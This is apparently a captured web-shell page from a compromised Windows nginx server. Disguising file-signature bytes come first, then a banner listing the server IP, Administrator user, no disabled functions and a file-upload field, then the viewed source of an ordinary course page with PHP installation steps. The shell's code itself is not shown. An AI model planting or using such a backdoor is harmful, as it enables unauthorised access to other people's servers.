GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/Setup/PHP/ |
Upload File : |
<? // Setup/PHP/PHPInstallation.php $TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. include('application.phpinc'); $title = "PHP Installation"; $headTitle = '_CST_ - '.$title; $pageTitle = '_CST_<br>'.$title; $pageMenu= 'JimMartinson/Setup/PHP/PHPMenu.phpinc'; include('common/pageHeader.phpinc'); $sectionTitle = $title; include('common/sectionHeader.phpinc'); $dataFolder = formValue('dataFolder',''); $courseNumber = formValue('courseNumber',''); if ($courseNumber == '') $courseNumber = 'CSTxxxx'; if ($courseNumber != 'CSTxxxx') { $courseNumberComment = ''; } else { $courseNumberComment = ' where <b>CSTxxxx</b> is the number of the course you are taking'; } $courseTitle = formValue('courseTitle',''); ?> <br> <?=$title?>: <? /** / $fileWeb_Ex = '/'.$Instructor['Name'].'/'.$courseNumber.'/Web_ExRecordings/'.$courseNumber.'_Lab01_'.str_replace(' ','_',$title).'.wrf'; #printVar('$fileWeb_Ex',$fileWeb_Ex); if (file_exists($_SERVER['DOCUMENT_ROOT'].$fileWeb_Ex)) { ?> <br>View the <a href="<?=$fileWeb_Ex?>"><?=$title?></a> Web_Ex recording. You need to install the <a href="../Web_ExWeb_Ex/Web_Ex_WRF_Player_v2.9.1109.msi">Web_Ex player</a> to view the recording. <? } /**/ ?> <ol class="instruction"> <li> Download <a href="php-5.2.13-win32-installer.msi">php-5.2.13-win32-installer.msi</a> and go through the install. Install to the \PHP directory on the same drive as Apache. <br> When done edit the \PHP\php.ini and change "extension=" to ";extension=" <br> <!-- Download <a href="php-5.0.5-Win32.zip">php-5.0.5-Win32.zip</a> <br> </li> <li> <br><img src="01.ExtractAll.jpg" alt="Extract All"> </li> <li> <br><img src="02.Next.jpg" alt="Next"> </li> <li> <br><img src="03.D_PHP.jpg" alt="D:\PHP"> </li> <li> <br><img src="04.Next.jpg" alt="Next"> </li> <li> <br><img src="05.UncheckShow.jpg" alt="UncheckShow"> </li> <li> <br><img src="06.Finish.jpg" alt="Finish"> </li> <li> <br><a href="php.ini">php.ini</a> </li> <li> <br> <pre>#BEGIN PHP INSTALLER EDITS - REMOVE ONLY ON UNINSTALL PHPIniDir "D:/PHP/" LoadModule php5_module "D:/PHP/php5apache2_2.dll" AddType application/x-httpd-php .php #END PHP INSTALLER EDITS - REMOVE ONLY ON UNINSTALL</pre> </li> <li> <br> </li> --> </ol> <? include('common/sectionFooter.phpinc'); include('common/pageFooter.phpinc'); ?>